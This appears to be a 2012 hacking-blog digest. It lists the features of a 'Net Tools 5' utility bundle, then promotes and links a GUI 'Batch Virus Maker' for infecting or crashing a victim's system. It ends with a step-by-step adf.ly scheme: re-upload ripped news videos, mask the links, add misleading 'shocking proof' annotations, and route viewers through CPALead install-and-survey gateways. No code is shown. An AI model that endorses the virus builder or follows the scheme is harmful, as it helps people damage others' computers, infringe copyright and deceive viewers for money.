149) NetTools Macro Recorder/Player (Keybord and Mouse Hook)
150) Network Protocol Analyzer
151) Steganographic Tools (Picture, Sounds, ZIP Compression and Misc Methods)
152) WebMirror (Website Ripper)
153) GeoLocate IP
154) Google PageRank Calculator
155) Google Link Crawler (Web Result Grabber)
156) Network Adapter Binder
157) Remote LAN PC Lister
158) Fast Sinusoidal Encryption
159) Software Scanner
160) Fast FTP Client
161) Network Traffic Analysis
162) Network Traffic Visualiser
163) Internet Protocol Scanner
164) Net Meter (Bandwidth Traffic Meter)
165) Net Configuration Switcher
166) Advanced System Hardware Info
167) Live System Information
168) Network Profiler
169) Network Browser
170) Quick Website Maker and Web Gallery Creator
171) Remote PC Shutdown
172) Serial Port Terminal
173) Standard Encryptor
174) Tray Minimizer
175) Extra Tools (nmap console & win32 version)

Many extra features and utilities are included in this package!

Screenshots
Here are a few screenshots of Net Tools 5. Click to enlarge.

Screenshot #1 - click to enlarge Screenshot #2 - click to enlarge Screenshot #3 - click to enlarge
Screenshot #4 - click to enlarge Screenshot #5 - click to enlarge Screenshot #6 - click to enlarge
Screenshot #7 - click to enlarge Screenshot #8 - click to enlarge Screenshot #9 - click to enlarge

Download Net Tools 5.0

[ download ] (version 5.0.70)
 
You can download the .NET Framework from the Microsoft site by clicking here. If you are not sure the Microsoft .NET Framework is installed click here.

Batch Virus Maker 2012 by an05

Posted: 10 Jan 2012 09:41 PM PST

Batch Virus Maker
Batch Virus Maker 2012 by an05
Hi all users as the title tells the story that this is a batch virus maker that creates the virus of your desire. 

When anyone talks about virus we simply get afraid, isn't it ? your answer may be vary. Let it be, as you might know that in olden days virus is like a hoax, and creating this is like a impossible thing for newbies, but as the security increased the virus's makers are also upgraded theirselves and developed better ways to infect, compromise and crash the system for their own deeds , but now a day's creating a virus isn't a big task and it's no require more technical skills as olden day, because there are many GUI programs are developed out there which helps them to create a virus of their desire within few minutes and by few clicks . 

Today I want to share a "batch virus maker" created by "an05" with you, which is based on batch method and able to hack/crash/prank your slave's system. Below is some screenshots of this program. I think you will no need a tutorial for using this because it's very simple to use, just select the desire tab and choose the option you want and finally click on build button to generate the virus, that's all.

Credit : an05
Download here
Enjoy.......

How To Get Millions of Hits Within Hours on Your Adf.ly Links

Posted: 11 Jan 2012 01:07 AM PST
Get Millions Of Hits Within Hours On Your Adf.ly Links
How To Get Millions of Hits Within Hours on Your Adf.ly Links

Hi all users, in our previous post "adf.ly bot 2012" we have provide a bot that automatically clicks on your links  and by reading it's review we have found that many user wants  to increase their adf.ly link's views so we have decided to make a tutorial on how to amazingly increase your adf.ly link's view and we are sure that this will very helpful for you. So lets get started :
 What is adf.ly?

It is a website where you get paid every time someone clicks on a link of yours. Depending on where you get your traffic from, you will get paid about $2 for 1000 clicks.

I know what you’re thinking. That’s horrible right? $0.002 for a single click? But that’s actually pretty decent compared to the other sites that get you about $0.30 per 1000. It is much better than Linkbucks, Linkbee, or any other competition.

Firs of all If you haven’t already signed up, go to :
 
And signup an account.
To get a huge amount of clicks on adf.ly is pretty simple. Just go viral! I’ll give you an example. Sometime around June, there was a video going around on news websites of “K-Strass the Yo-Yo master”. It had quite a significant amount of mention on the news. So I thought, why not upload this video to YouTube and get some hits. Unluckily, I was late and the video had already been uploaded by someone else.

His video was up for 3 days, and had already gotten over 67 000 000 views!!! If only 20% the people visited an adf.ly link, that would still be $40 000 in 3 days. However, the person who uploaded the video did not seem to monetize the video at all, making no money...

Now that guy was stupid. YOU can be different and make the $200 000 he never did. Here’s how
STEP 1:
Get prepared. What you need is a program to download videos off websites such as “Download Helper”. You should also get a Free Screen Recorder, such as :

Also, register accounts on YouTube, Digg, StumbleUpon and i-am-bored.
 STEP 2:
Start lurking around on US Breaking news websites, such as www.CNN.com, www.foxnews.com and www.cbsnews.com . You have to be very patient and wait around, until you find a good video with viral potential.

Examples of videos that are guaranteed to go viral- Ghost Videos (Michael Jackson’s ghost) Live TV stuff-ups (People swearing live on air, Celebrities hitting paparazzi, “Wardrobe malfunctions” ).

So just wait around until a video like this pops up on one of the news websites. It may take a while to find a good lead, you may have to wait several days. Bookmark the “Breaking News” sites and check back occasionally.

Just wait..........................................................
And wait....................................................
STEP 3:
Got your video? Now it is time to act FAST. Try downloading the video using “Download Helper”. If it doesn’t work, what you have to do is record the video with your screen recorder. (Make sure the volume is right if you are recording).

Now upload the video onto YouTube. Make sure you have a good title, description and tags.

STEP 4

Submit your video to Digg, StumbleUpon and i-am-bored.

STEP 5

Take a break. You don’t need to do anything for the next few hours.
STEP 6

Now, check back on your video. If everything is working well as planned, you should have a few thousand views. If not, try and submit to more websites similar to www.i-am-bored.com .
 
STEP 7

Wait a few more hours.

STEP 8

You should be getting thousands and thousands of hits by now. Links to your video should already be posted on Digg, StumbleUpon, and www.i-am-bored.com . You should be getting a steady flow of a few hundred views a minute now. So now it is time to monetize your video.
 
STEP 9 

Find out what it is you want to link to. For example, a news story, Facebook group or anything related to your video. For this example, I will just choose a news article. 

STEP 10 

Create an adf.ly link and mask it with www.joynic.com . Masking the URL is VERY important.
Rename your URL to something like www.truthaboutmichaeljacksonsghost.us or whatever.

STEP 11 

Now, create an annotation all through the video. To do this, click on “Edit Video” and click “annotations”. Place the annotation at the bottom of the video.

An example of an annotation would be -

Is Michael Jackson really dead? See the shocking new proof at the link in the description!!!!

Sadly, a lot of people don’t seem to click the links in the description. If only 50% of video viewers click the link, you should still be happy! 

STEP 12

As with all viral videos, your one will only be popular for a few days. When all the hype dies down, and you are not getting enough money from adf.ly , it is time to monetize it with and CPALead. So sign up at www.cpalead.com .
What are these sites? With LoudMo and CPALead, you get paid around $1 every time someone accesses your site. But before they can access they have to install a small program and complete a short, free to take survey.
A lot of people won’t be able to access your site but you will still get some diehard fans wanting to access whatever you link to.
So, go to www.blogger.com and make a site. Put your content on the page and put a CPALead gateway on. 


That’s All! Remember, no one got rich reading guides! Don’t be lazy and follow my instructions! 

Good Luck!